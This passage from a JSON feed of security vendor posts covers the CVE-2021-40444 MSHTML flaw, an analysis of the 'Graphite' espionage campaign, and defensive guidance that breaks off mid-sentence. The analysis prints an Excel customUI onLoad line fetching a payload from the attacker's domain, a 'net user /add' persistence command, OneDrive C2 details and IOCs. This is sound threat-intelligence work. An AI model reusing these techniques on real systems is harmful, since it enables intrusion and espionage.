document below, the **document.xml.rels** file with **Type** attribute as \u201coleObject\u201d, **Target** attribute set to the OLE object link and **TargetMode** set as external. This allows the crafted document to link to the externally hosted malicious object and invoke the respective protocol / resource handlers for rendering the object, to exploit a potential logic / design flaw in the handler. This is typical OOXML template injection techniques used in many OOXML exploits in the past. We had an in depth look on OLE exploits in our [previous blog post](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/an-inside-look-into-microsoft-rich-text-format-and-ole-exploits/>).\n\n **Figure 11 \u2013 document.xml.rels file in the OOXML document linking to external OLE object**\n\nHTML code processing is done in **mshtml.dll** while HTTP protocol and MSHTML downloads are verified for trust and handled in urlmon.dll. The design flaw in the **urlmon.dll** code was in relation to the extraction and the trust verification of the downloaded CAB file. The CAB file was downloaded via Javascript (JS) code embedded within the **side.html** page as in figure 11 above. Because of the missing path escape checks during the extraction of the CAB file, it allowed the exploit to extract the file contained within the CAB with the relative path per figure 12 below. This resulted into dropping of the malicious payload outside of the created TEMP directory, eventually allowing the dropped payload to be executed.\n\n **Figure 12 \u2013 Vulnerability in CAB file extraction function in urlmon.dll**\n\n##### Conclusion\n\nThere has been a trend in the past few years of vulnerabilities like CVE-2021-44228, CVE-2021-34527, CVE-2021-36942 and CVE-2021-40444 described above which take advantage of inherent processing flaws and are predominantly feature abuse. While memory corruption flaws will continue to proliferate as long as insecure code exists in non-memory safe languages other than Rust, we certainly expect to see the exploitation trend moving more towards exploiting design or logic flaws and protocol abuses. Consumers as well as the developers of open source software need to be more vigilant as these flaws will allow adversaries to achieve their initial system level objective of moving laterally within the network ,without worrying about the defense in depth of recently matured memory exploit mitigations.\n", "cvss3": {}, "published": "2022-01-24T00:00:00", "type": "trellix", "title": "Beyond Memory Corruption Vulnerabilities \u2013 A Security Extinction and Future of Exploitation", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-34527", "CVE-2021-36942", "CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-01-24T00:00:00", "id": "TRELLIX:ED6978182DFD9CD1EA1E539B1EDABE6C", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/beyond-memory-corruption-vulnerabilities.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-01-25T00:00:00", "description": "# Prime Minister\u2019s Office Compromised: Details of Recent Espionage Campaign\n\nBy Marc Elias \u00b7 January 25, 2022\n\nA special thanks to Christiaan Beek, Alexandre Mundo, Leandro Velasco and Max Kersten for malware analysis and support during this investigation.\n\n#### Executive Summary\n\nOur Advanced Threat Research Team have identified a multi-stage espionage campaign targeting high-ranking government officials Western Asia and Eastern Europe. As we detail the technical components of this attack, we can confirm that we have undertaken pre-release disclosure to the victims and provided all necessary content required to remove all known attack components from their environments. \n\nThe infection chain starts with the execution of an Excel downloader, most likely sent to the victim via email, which exploits an MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-defender-blog-mshtml-cve-2021-40444/>)) to execute a malicious executable in memory. The attack uses a follow-up piece of malware called Graphite because it uses Microsoft\u2019s Graph API to leverage OneDrive as a command and control server\u2014a technique our team has not seen before. Furthermore, the attack was split into multiple stages to stay as hidden as possible. \n\nCommand and control functions used an Empire server that was prepared in July 2021, and the actual campaign was active from October to November 2021. The below blog will explain the inner workings, victimology, infrastructure and timeline of the attack and, of course, reveal the IOCs and MITRE ATT&amp;CK techniques.\n\nA number of the attack indicators and apparent geopolitical objectives resemble those associated with the previously uncovered threat actor APT28. While we don\u2019t believe in attributing any campaign solely based on such evidence, we have a moderate level of confidence that our assumption is accurate. That said, we are supremely confident that we are dealing with a very skilled actor based on how infrastructure, malware coding and operation were setup.\n\nTrellix customers are protected by the different McAfee Enterprise and FireEye products that were provided with these indicators.\n\n#### Analysis of the Attack Process\n\nThis section provides an analysis of the overall process of the attack, beginning with the execution of an Excel file containing an exploit for the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-defender-blog-mshtml-cve-2021-40444/>)) vulnerability. This is used to execute a malicious DLL file acting as a downloader for the third stage malware we called Graphite. Graphite is a newly discovered malware sample based on a OneDrive Empire Stager which leverages OneDrive accounts as a command and control server via the Microsoft Graph API. \n\nThe last phases of this multi-stage attack, which we believe is associated with an APT operation, includes the execution of different Empire stagers to finally download an Empire agent on victims\u2019 computers and engage the command and control server to remotely control the systems.\n\nThe following diagram shows the overall process of this attack.\n\n **Figure 1. Attack flow**\n\n### First Stage \u2013 Excel Downloaders\n\nAs suggested, the first stage of the attack likely uses a spear phishing email to lure victims into opening an Excel file, which goes by the name \u201cparliament_rew.xlsx\u201d. Below you can see the identifying information for this file:\n\nFile type | Excel Microsoft Office Open XML Format document \n---|--- \nFile name | parliament_rew.xlsx \nFile size | 19.26 KB \nCompilation time | 05/10/2021 \nMD5 | 8e2f8c95b1919651fcac7293cb704c1c \nSHA-256 | f007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4 \n \n **Figure 2. Decoy text observed in the Excel file**\n\nIn analyzing this file\u2019s structure, we observed that it includes a folder named \u201ccustomUI\u201d that contains a file named \u201ccustomUI.xml\u201d. Opening this file with a text editor, we observed that the malicious document uses the \u201cCustomUI.OnLoad\u201d property of the OpenXML format to load an external file from a remote server: \n\n** &lt;customUI xmlns**=\"http://schemas.microsoft.com/office/2006/01/customui\" onLoad='https://wordkeyvpload[.]net/keys/parliament_rew.xls!123'&gt; &lt;/customUI&gt;\n\nThis technique allows the attackers to bypass some antivirus scanning engines and office analysis tools, decreasing the chances of the documents being detected. \n\nThe downloaded file is again an Excel spreadsheet, but this time it is saved using the old Microsoft Office Excel 97-2003 Binary File Format (.xls). Below you can see the identifying information of the file:\n\nFile type | Microsoft Office Excel 97-2003 Binary File Format \n---|--- \nFile name | parliament_rew.xls \nFile size | 20.00 KB \nCompilation time | 05/10/2021 \nMD5 | abd182f7f7b36e9a1ea9ac210d1899df \nSHA-256 | 7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a \n \nAnalyzing the metadata objects, we can identify that the creator was using the codepage 1252 used in Western European countries and the file was created on October 5th, 2021.\n\n **Figure 3. Document metadata**\n\nLater, we analyzed the OLE objects in the document and discovered a Linked Object OLEStream Structure which contains a link to the exploit of the CVE-2021-40444 vulnerability hosted in the attackers\u2019 server. This allows the document to automatically download the HTML file and subsequently call the Internet Explorer engine to interpret it, triggering the execution of the exploit.\n\n **Figure 4. Remote link in OLE object**\n\nIn this blog post we won\u2019t examine the internals of the CVE-2021-40444 vulnerability as it has already been publicly explained and discussed. Instead, we will continue the analysis on the second stage DLL contained in the CAB file of the exploit.\n\n#### Second Stage \u2013 DLL Downloader\n\nThe second stage is a DLL executable named fontsubc.dll which was extracted from the CAB file used in the exploit mentioned before. You can see the identifying information of the file below:\n\nFile type | PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit \n---|--- \nFile name | fontsubc.dll \nFile size | 88.50 KB \nCompilation time | 28/09/2021 \nMD5 | 81de02d6e6fca8e16f2914ebd2176b78 \nSHA-256 | 1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40 \n \nThis file exports a function called \u201cCPlApplet\u201d that Windows recognizes as a control panel application. Primarily, this acts a downloader for the next stage malware which is located at hxxps://wordkeyvpload[.]net/keys/update[.]dat using COM Objects and the API \u201cURLOpenBlockingStreamW\u201d. \n\n **Figure 5. Download of next stage malware**\n\nAfter downloading the file, the malware will decrypt it with an embedded RSA Public Key and check its integrity calculating a SHA-256 of the decrypted payload. Lastly, the malware will allocate virtual memory, copy the payload to it and execute it.\n\n **Figure 6. Payload decryption and execution**\n\nBefore executing the downloaded payload, the malware will compare the first four bytes with the magic value DE 47 AC 45 in hexadecimal; if they are different, it won\u2019t execute the payload.\n\n **Figure 7. Malware magic value**\n\n#### Third Stage \u2013 Graphite Malware\n\nThe third stage is a DLL executable, never written to disk, named dfsvc.dll that we were able to extract from the memory of the previous stage. Below you can see the identifying information of the file:\n\nFile type | PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit \n---|--- \nFile name | dfsvc.dll \nFile size | 24.00 KB \nCompilation time | 20/09/2021 \nMD5 | 0ff09c344fc672880fdb03d429c7bda4 \nSHA-256 | f229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231 \n \nWe named this malware Graphite due to the use of the Microsoft Graph API to use OneDrive as command and control. It is very likely that the developers of Graphite used the Empire OneDrive Stager as a reference due to the similarities of the functionality and the file structure used in the OneDrive account of the actors.\n\n **Figure 8. Empire OneDrive stager API requests**\n\nGraphite starts by creating a mutex with the hardcoded name \u201c250gHJAWUI289382s3h3Uasuh289di\u201d to avoid double executions, decrypt the strings and resolve dynamically the APIs it will use later. Moreover, it will calculate a bot identifier to identify the infected computer which is a CRC32 checksum of the value stored in the registry key \u201cHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\ Cryptography\\MachineGuid\u201d.\n\n **Figure 9. Graphite initializations**\n\nNext, the malware will create a thread to monitor the execution of tasks and upload its results to the OneDrive account. Result files will be uploaded to the \u201cupdate\u201d folder of the attackers\u2019 OneDrive account. \n\n **Figure 10. Thread to monitor task results**\n\nAfter that, the malware will enter into an infinite loop where every 20 minutes it will obtain a new OAuth2 token to use with the Microsoft Graph API requests and determine if there are new tasks to execute in the \u201ccheck\u201d folder of the attackers\u2019 OneDrive account. \n\n **Figure 11. Request of new OAuth2 token**\n\nOnce it obtained a valid OAuth2 token, reconnaissance data is gathered containing the following information from the victims\u2019 systems:\n\n * Running processes\n * .NET CLR version from PowerShell\n * Windows OS version\n\nThe data is compressed using the LZNT1 algorithm and encrypted with a hardcoded AES-256-CBC key with a random IV. The operator tasks are encoded in the same way. Finally, the file containing the system information is uploaded to the folder \u201c{BOT_ID}/update\u201d in OneDrive with a random name.\n\n **Figure 12. Graphite encoding data**\n\nGraphite will also query for new commands by enumerating the child files in the \"check\" subdirectory. If a new file is found, it will use the Graph API to download the content of the file and decrypt it. The decrypted tasks have two fields; the first one is a unique identifier of the task and the second one specifies the command to execute.\n\nThe command value \u201c1\u201d will instruct the malware to send the system information to the command and control again, which is the attackers\u2019 OneDrive. The command value \u201c2\u201d indicates that the decrypted task is a shellcode, and the malware will create a thread to execute it.\n\n **Figure 13. Graphite commands**\n\nIf the received task is a shellcode, it will check the third field with the magic value DE 47 AC 45 in hexadecimal and, if they are different, it won\u2019t execute the payload. The rest of the bytes of the task is the shellcode that will be executed. Lastly, the task files are deleted from the OneDrive after being processed.\n\n **Figure 14. Decrypted operator task**\n\nThe diagram below summarizes the flow of the Graphite malware.\n\n **Figure 15. Graphite execution diagram**\n\n#### Fourth Stage \u2013 Empire DLL Launcher Stager\n\nThe fourth stage is a dynamic library file named csiresources.dll that we were able to extract from a task from the previous stage. The file was embedded into a Graphite shellcode task used to reflectively load the executable into the memory of the process and execute it. Below you can see the identifying information of the file:\n\nFile type | PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit \n---|--- \nFile name | csiresources.dll \nFile size | 111.00 KB \nCompilation time | 21/09/2021 \nMD5 | 138122869fb47e3c1a0dfe66d4736f9b \nSHA-256 | 25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9 \n \nThe sample is a generated Empire DLL Launcher stager that will initialize and start the .NET CLR Runtime into an unmanaged process to execute a download-cradle to stage an Empire agent. With that, it is possible to run the Empire agent in a process that\u2019s not PowerShell.exe.\n\nFirst, the malware will check if the malware is executing from the explorer.exe process. If it is not, the malware will exit.\n\n **Figure 16. Process name check**\n\nNext, the malware will try to find the file \u201cEhStorShell.dll\u201d in the System32 folder and load it. With this, the malware makes sure that the original \u201cEhStorShell.dll\u201d file is loaded into the explorer.exe context.\n\n **Figure 17. Loading EhStorShell.dll library**\n\nThe previous operation is important because the follow-up malware will override the CLSID \u201c{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}\u201d to gain persistence in the victims\u2019 system, performing a COM Hijacking technique. The aforementioned CLSID corresponds to the \u201cEnhanced Storage Shell Extension DLL\u201d and is handled by the file \u201cEhStorShell.dll\u201d.\n\nComing up next, the malware will load, initialize and start the .NET CLR Runtime, XOR decrypt the .NET next stage payload and load it into memory. Lastly, it will execute the file using the .NET Runtime.\n\n **Figure 18. Decryption of next stage malware**\n\n#### Fifth Stage \u2013 Empire PowerShell C# Stager\n\nThe fifth stage is a .NET executable named Service.exe which was embedded and encrypted in the previous stage. Below you can see the identifying information of the file:\n\nFile type | PE32 executable for MS Windows (console) Intel 80386 32-bit \n---|--- \nFile size | 34.00 KB \nMD5 | 3b27fe7b346e3dabd08e618c9674e007 \nSHA-256 | d5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317 \n \nThis sample is an Empire PowerShell C# Stager whose main goal is to create an instance of a PowerShell object, decrypt the embedded PowerShell script using XOR operations and decode it with Base64 before finally executing the payload with the Invoke function.\n\n **Figure 19. Fifth stage code**\n\nThe reason behind using a .NET executable to load and execute PowerShell code is to bypass security measures like AMSI, allowing execution from a process that shouldn\u2019t allow it.\n\n#### Sixth Stage \u2013 Empire HTTP PowerShell Stager\n\nThe last stage is a PowerShell script, specifically an Empire HTTP Stager, which was embedded and encrypted in the previous stage. Below you can see the identifying information of the file:\n\nFile type | Powershell script \n---|--- \nFile size | 6.00 KB \nMD5 | a81fab5cf0c2a1c66e50184c38283e0e \nSHA-256 | da5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37 \n \nAs we mentioned earlier, this is the last stage of the multi-stage attack and is an HTTP stager highly obfuscated using the Invoke-Obfuscation script from Empire to make analysis difficult.\n\n **Figure 20. Obfuscated PowerShell script**\n\nThe main functionality of the script is to contact hxxp://wordkeyvpload[.]org/index[.]jsp to send the initial information about the system and connect to the URL hxxp://wordkeyvpload[.]org/index[.]php to download the encrypted Empire agent, decrypt it with AES-256 and execute it. \n\n#### Timeline of Events\n\nBased on all the activities monitored and analyzed, we provide the following timeline of events:\n\n **Figure 21. Timeline of the campaign**\n\n#### Targeting\n\nOne of the lure documents we mentioned before (named \u201cparliament_rew.xlsx\u201d) might have been aimed for targeting government employees.\n\nBesides targeting government entities, it appears this adversary also has its sights on the defense industry. Another document with the name \u201cMissions Budget.xlsx\u201d contained the text \u201cMilitary and civilian missions and operations\u201d and the budgets in dollars for the military operations in some countries for the years 2022 and 2023.\n\n **Figure 22. Lure document targeting the defense sector**\n\nMoreover, from our telemetry we also have observed that Poland and other Eastern European countries were of interest to the actors behind this campaign.\n\nThe complete victimology of the actors is unknown, but the lure documents we have seen show its activities are centered in specific regions and industries. Based on the names, the content of the malicious Excel files and our telemetry, targeting countries in Western Asia and Eastern Europe and the most prevalent industries are Defense and Government.\n\n#### Infrastructure\n\nThanks to the analysis of the full attack chain, two hosts related to the attack were identified. The first domain is wordkeyvpload.net which resolves to the IP 131.153.96.114, located in Serbia and registered on the 7th of July 2021 with OwnRegistrar Inc. \n\nQuerying the IP with a reverse DNS lookup tool, a PTR record was obtained resolving to the domain \u201cbwh7196.bitcoinwebhosting.net\u201d which could be an indication that the server was bought from the Bitcoin Web Hosting VPS reseller company.\n\n **Figure 23. Reverse DNS query**\n\nThe main functionality of this command-and-control server is to host the HTML exploit for CVE-2021-40444 and the CAB file containing the second stage DLL.\n\nThe second domain identified is wordkeyvpload.org which resolves to the IP 185.117.88.19, located in Sweden, and registered on the 18th of June 2021 with Namecheap Inc. Based on the operating system (Microsoft Windows Server 2008 R2), the HTTP server (Microsoft-IIS/7.5) and the open ports (1337 and 5000) it is very likely the host is running the latest version of the Empire post-exploitation framework.\n\nThe reason behind that hypothesis is that the default configuration of Empire servers uses port 1337 to host a RESTful API and port 5000 hosts a SocketIO interface to interact remotely with the server. Also, when deploying a HTTP Listener, the default value for the HTTP Server field is hardcoded to \u201cMicrosoft-IIS/7.5\u201d.\n\n **Figure 24. Local Empire server execution with default configuration**\n\nWith the aforementioned information, as well as the extraction of the command and control from the last stage of the malware, we can confirm that this host acts as an Empire server used to remotely control the agents installed in victims\u2019 machines and send commands to execute them.\n\n#### Attribution\n\nDuring the timeline of this operation there have been some political tensions around the Armenian and Azerbaijani border. Therefore, from a classic intelligence operation point of view, it would make complete sense to infiltrate and gather information to assess the risk and movements of the different parties involved. \n\nThroughout our research into the Graphite campaign, we extracted all timestamps of activity from the attackers from our telemetry and found two consistent trends. First, the activity days of the adversary are from Monday to Friday, as depicted in the image below:\n\n **Figure 25. Adversary\u2019s working days**\n\nSecond, the activity timestamps correspond to normal business hours (from 08h to 18h) in the GMT+3 time zone, which includes Moscow Time, Turkey Time, Arabia Standard Time and East Africa Time.\n\n **Figure 26. Adversary\u2019s working hours**\n\nAnother interesting discovery during the investigation was that the attackers were using the CLSID (D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D) for persistence, which matched with an ESET report in which researchers mentioned a Russian Operation targeting Eastern European countries.\n\nAnalyzing and comparing code-blocks and sequences from the graphite malware with our database of samples, we discovered overlap with samples in 2018 being attributed to APT28. We compared for example our samples towards this one: 5bb9f53636efafdd30023d44be1be55bf7c7b7d5 (sha1):\n\n **Figure 27 Code comparison of samples**\n\nWhen we zoom in on some of the functions, we observe on the left side of the below picture the graphite sample and on the right the forementioned 2018 sample. With almost three years in time difference, it makes sense that code is changed, but still it looks like the programmer was happy with some of the previous functions:\n\n **Figure 28 Similar function flow**\n\nAlthough we mentioned some tactics, techniques and procedures (TTPs) of the actors behind this campaign, we simply do not have enough context, similarities or overlap to point us with low/moderate confidence towards APT28, let alone a nation-state sponsor. However, we believe we are dealing with a skilled actor based on how the infrastructure, malware coding and operation was setup. \n\n#### Conclusion\n\nThe analysis of the campaign described in this blog post allowed us to gather insights into a multi-staged attack performed in early October, leveraging the MSHTML remote code execution vulnerability (CVE-2021-40444) to target countries in Eastern Europe. \n\nAs seen in the analysis of the Graphite malware, one quite innovative functionality is the use of the OneDrive service as a Command and Control through querying the Microsoft Graph API with a hardcoded token in the malware. This type of communication allows the malware to go unnoticed in the victims\u2019 systems since it will only connect to legitimate Microsoft domains and won\u2019t show any suspicious network traffic.\n\nThanks to the analysis of the full attack process, we were able to identify new infrastructure acting as command and control from the actors and the final payload, which is an agent from the post-exploitation framework Empire. All the above allowed us to construct a timeline of the activity observed in the campaign.\n\nThe actors behind the attack seem very advanced based on the targeting, the malware and the infrastructure used in the operation, so we presume that the main goal of this campaign is espionage. With a low and moderate confidence, we believe this operation was executed by APT28. To further investigate, we provided some tactics, techniques and procedures (TTPs), indicators on the infrastructure, targeting and capabilities to detect this campaign.\n\n#### MITRE ATT&amp;CK Techniques\n\nTactic | Technique ID | Technique Title | Observable | IOCs \n---|---|---|---|--- \nResource Development | T1583.001 | Acquire Infrastructure: Domains | Attackers purchased domains to be used as a command and control. | wordkeyvpload[.]net \nwordkeyvpload[.]org \nResource Development | T1587.001 | Develop capabilities: Malware | Attackers built malicious components to conduct their attack. | Graphite malware \nResource Development | T1588.002 | Develop capabilities: Tool | Attackers employed red teaming tools to conduct their attack. | Empire \nInitial Access | T1566.001 | Phishing: Spear phishing Attachment | Adversaries sent spear phishing emails with a malicious attachment to gain access to victim systems. | BM-D(2021)0247.xlsx \nExecution | T1203 | Exploitation for Client Execution | Adversaries exploited a vulnerability in Microsoft Office to execute code. | CVE-2021-40444 \nExecution | T1059.001 | Command and Scripting Interpreter: PowerShell | Adversaries abused PowerShell for execution of the Empire stager. | Empire Powershell stager \nPersistence | T1546.015 | Event Triggered Execution: Component Object Model Hijacking | Adversaries established persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. | CLSID: D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D \nPersistence | T1136.001 | Create Account: Local Account | Adversaries created a local account to maintain access to victim systems. | net user /add user1 \nDefense Evasion | T1620 | Reflective Code Loading | Adversaries reflectively loaded code into a process to conceal the execution of malicious payloads. | Empire DLL Launcher stager \nCommand and Control | T1104 | Multi-Stage Channels | Adversaries created multiple stages to obfuscate the command-and-control channel and to make detection more difficult. | Use of different Empire stagers \nCommand and Control | T1102.002 | Web Service: Bidirectional Communication | Adversaries used an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. | Microsoft OneDrive \nEmpire Server \nCommand and Control | T1573.001 | Encrypted Channel: Symmetric Cryptography | Adversaries employed a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. | AES 256 \nCommand and Control | T1573.002 | Encrypted Channel: Asymmetric Cryptography | Adversaries employed a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. | RSA \n \n#### Indicators of Compromise (IOCs)\n\n##### First stage \u2013 Excel Downloaders\n\n40d56f10a54bd8031191638e7df74753315e76f198192b6e3965d182136fc2fa \nf007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4 \n7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a \n9052568af4c2e9935c837c9bdcffc79183862df083b58aae167a480bd3892ad0 \n\n\n##### Second stage \u2013 Downloader DLL\n\n1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40 \n\n\n##### Third stage \u2013 Graphite\n\n35f2a4d11264e7729eaf7a7e002de0799d0981057187793c0ba93f636126135f \nf229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231 \n\n\n##### Fourth stage \u2013 DLL Launcher Stager\n\n25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9 \n\n\n##### Fifth stage \u2013 PowerShell C# Stager\n\nd5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317 \n\n\n##### Sixth stage \u2013 Empire HTTP Powershell Stager\n\nda5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37 \n\n\n##### URLs\n\nhxxps://wordkeyvpload[.]net/keys/Missions Budget Lb.xls \nhxxps://wordkeyvpload[.]net/keys/parliament_rew.xls \nhxxps://wordkeyvpload[.]net/keys/Missions Budget.xls \nhxxps://wordkeyvpload[.]net/keys/TR_comparison.xls \n\n\nhxxps://wordkeyvpload[.]net/keys/JjnJq3.html \nhxxps://wordkeyvpload[.]net/keys/iz7hfD.html \nhxxps://wordkeyvpload[.]net/keys/Ari2Rc.html \nhxxps://wordkeyvpload[.]net/keys/OD4cNq.html \n\n\nhxxps://wordkeyvpload[.]net/keys/0YOL4.cab \nhxxps://wordkeyvpload[.]net/keys/whmel.cab \nhxxps://wordkeyvpload[.]net/keys/UdOpQ.cab \nhxxps://wordkeyvpload[.]net/keys/D9V5E.cab \n\n\nhxxps://wordkeyvpload[.]net/keys/update.dat \n\n\nhxxps://wordkeyvpload[.]org/index.jsp \nhxxps://wordkeyvpload[.]org/index.php \nhxxps://wordkeyvpload[.]org/news.php \nhxxps://wordkeyvpload[.]org/admin/get.php \nhxxps://wordkeyvpload[.]org/login/process.php \n\n\n##### Domains\n\nwordkeyvpload[.]net \nwordkeyvpload[.]org \njimbeam[.]live \n\n\n##### IPs\n\n131.153.96[.]114 \n185.117.88[.]19 \n94.140.112[.]178 \n\n", "cvss3": {}, "published": "2022-01-25T00:00:00", "type": "trellix", "title": "Prime Minister\u2019s Office Compromised: Details of Recent Espionage Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-25T00:00:00", "id": "TRELLIX:6949BCDE9887B6759BD81365E21DD71C", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/prime-ministers-office-compromised.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-20T00:00:00", "description": "\n\n# Trellix Global Defenders: Defending against Cyber Espionage Campaigns \u2013 Operation Graphite\n\nBy Ben Marandel, **Arnab Roy** \u00b7 June 20, 2022\n\nCyber Espionage campaigns by nature are targeted attacks that can go undetected for prolonged periods of time. Cyber Espionage campaigns often involve adversaries with clear objectives with capabilities to avoid defenses and leverage trusted enterprise IT systems or operational weaknesses within organisations. Some of the key targets for espionage campaigns are as follows:\n\n Figure 1: Cyber Espionage Key Targets \n\n\nThe ultimate goal of most cyber espionage campaigns are data exfiltration and wide spread reconasaince.\n\n## Operation graphite introduction \n\nTrellix Advanced Threat Research team released threat research on the 25th of January 2022 which highlighted discovery of a new espionage campaign targeting high-ranking government officials Western Asia and Eastern Europe. The attack is believed to have been triggered via targeted phishing with malicious macro enabled word document used to establish the initial access. Once executed the malicious document leveraged a vulnerability in Excel (CVE2021-40444) which allows remote code execution on the impacted endpoint. Similar to other espionage campaigns their was hands on recon of the targeted organization, specifically looking for documents with specific keywords of interest. This was followed by multi-stage attack which included lateral movement to other systems of interest such as domain controllers and file servers. The following figure shows the attack progression:\n\n Figure 2: Attack Chain \n\n\nLike most multi-stage attacks a combination of exploitation techniques are observed such as use of LolBas/LolBins like Powershell and exploitation of enterprise architecture and system vulnerabilities.\n\nDuring our analysis of the overall flow of the attack and the related payloads the following attributes of the attack stood out that could be critical at detecting/preventing this threat:\n\n 1. Use of OneDrive as a command a control server as well as for storing payload configuration and staging. Their is evidence that the OneDrive Implant module of the empire framework was used by the threat actor which has been documented by the [empire framework maintainers](<https://www.bc-security.org/post/using-the-onedrive-listener-in-empire-3-1-3/>). This was used specifically to subvert network security controls and hide traffic inside legitimate applications. \n 2. Use of embedded XLS into XLSX to bypass macro execution protection added in Office Excel. The XLS file is used as a secondary payload which is exploiting the CVE-2021-40444, this is not the first file to be open by the victim. To maximize the chances of execution of the exploitable XLS document the attacker uses dynamic loading of the office ribbon and custom options in the office toolbar by using a XLSM file, this XLSM file then dynamically loads the XLS file which triggers the execution of CVE-2021-40444.\n\nBased on the observed TTP\u2019s and operational similarity Trellix Threat research team was moderately confident that this attack could be attributed to APT 28.\n\n## Defensive architecture guidance\n\nThe question is how do we protect ourselves from such attacks? At the heart of the answer is building an effective threat model for cyber espionage campaigns and then driving your defensive strategy based on \u201cthink red - act blue mindset\u201d where the threat informed layered defensive strategy drives how the security controls are configured to provide a resilient defensive architecture. Below is how the Trellix XDR solution architecture protects and detects this attack.\n\n Figure 3: Trellix Solution Architecture \n\n\nOrganizations can build an effective threat model based on adversary characteristics some of which is very well documented within the MITRE ATT&amp;CK framework. Leveraging tools like MITRE ATT&amp;CK navigator is one of the methods where you can combine multiple threat actor TTP\u2019s and create an effective threat model for your SOC, an example below for TTP\u2019s used by APT 28:\n\n**Common techniques used for Cyber Espionage - using ATT&amp;CK**\n\n Figure 4: MITRE ATT&amp;CK Navigator for APT28 \n\n\nHowever, for customers who have Trellix Insights this process is even simpler: By filtering the Profiles to APT28, you will get a complete overview of the APT28 Group activities. As an introduction the tool will give you a short description of the group and their current targeted countries / sectors. \n\n Figure 5: APT28 Group Overview from MVISION Insights \n\n\nJust after this introduction, you will get overview of the 42+ campaign currently observed by the Trellix Labs. This view also indicates which endpoints within your organization may have insufficient coverage to protect themselves. By clicking on the name of the campaign, you will pivot to the full details of the selected campaign.\n\n Figure 6: Examples of APT28 related campaigns from MVISION Insights \n\n\nThe third section of the interface, describes the MITRE Techniques of Tools used by APT28 group. Once C2 communications is established, researchers established the use of \u201cFiles and Directory Discovery \u2013 T1083\u201d technique for Discovery and \u201cData Transfer Size Limits \u2013 T1030\u201d technique for Exfiltration.\n\nThis group also uses tools such as Mimikatz to simplify Credential Access via LSASS Memory \u2013 T1003.001, Certutil to download third-party tools or X-Tunnel for Exfiltration over Asymmetric Encrypted Non-C2 Protocols \u2013 T1048.002. \n\n Figure 7: MITRE Techniques used by the APT28 Group from MVISION Insights \n\n\nAnd finally, based on all those information, the interface builds for you the powerful ATT&amp;CK Matrix with a clear representation of the observed techniques.\n\n Figure 8: APT28 Group MITRE ATT&amp;CK matrix from MVISION Insights \n\n\n**Endpoint Protection Actions:** Trellix Endpoint uses exploit prevention to block execution of CVE-2021-40444 as well as use behavioral threat protection via Adaptive Threat Prevention module. Specifically, Advanced Behavior Blocking (ABB) rules stop the execution of child processes from office processes thus breaking the kill chain early in the attack lifecycle. The following rules in Trellix ENS Exploit Prevention and Adaptive Threat Protection (ATP) are recommended to observe or block behavioral activity associated with exploitation techniques.\n\n**ENS Exploit Prevention Signature 6163:** T1055: Suspicious Behavior: Malicious Shell Injection Detected\n\n**ENS Exploit Prevention Signature 6115:** T1055: Fileless Threat: Reflective DLL Remote Injection\n\n**ENS ATP Rule 300:** T1566: Prevent office applications from launching child processes that can execute script commands \n\nTo complement protection capabilities, Trellix EDR solution detects and visualizes the attack chain, as illustrated bellow at the \u201cInitial Access\u201d when the victim is opening for the first time the specifically crafted XLSX file.\n\nIn this screenshot of a demo sample illustrating Office Excel, you can observe the download of the XLS file natively through an HTTPS connection, after it has opened the XLSX file.\n\n Figure 9: Excel.exe opening an XLSX file and then downloading an XLS file, captured by MVISION EDR \n\n\n**Preventing Data Exfiltration:** Preventing the attempts to exfiltrate data can defeat this type of attack at an early stage. The threat actor uses two key techniques for data exfiltration: exfiltration over existing network protocols and endpoint data reconnaissance techniques. The exfiltration over the existing network protocol leverages the Microsoft Graph API utilized by O365 suite of apps to communicate between various O365 services. The graph API has been a target of previous APT campaigns as it provides a unique insight into existing enterprise data sitting inside O365. One of the key ways this attack can be completely defeated is by ensuring users cannot login to non-sanctioned O365 tenants. This is possible by leveraging a URL content proxy that inspects the O365 instance id in the login URL of the tenant and subsequent communication. The proxy can be configured to only allow the organizational tenant id of the enterprise O365 instance and not that of other O365 tenants. This will prevent the threat actor from succeeding in establishing the initial command and control connection as well as data exfiltration. Deploying endpoint DLP is the second critical factor in preventing the data exfiltration of sensitive 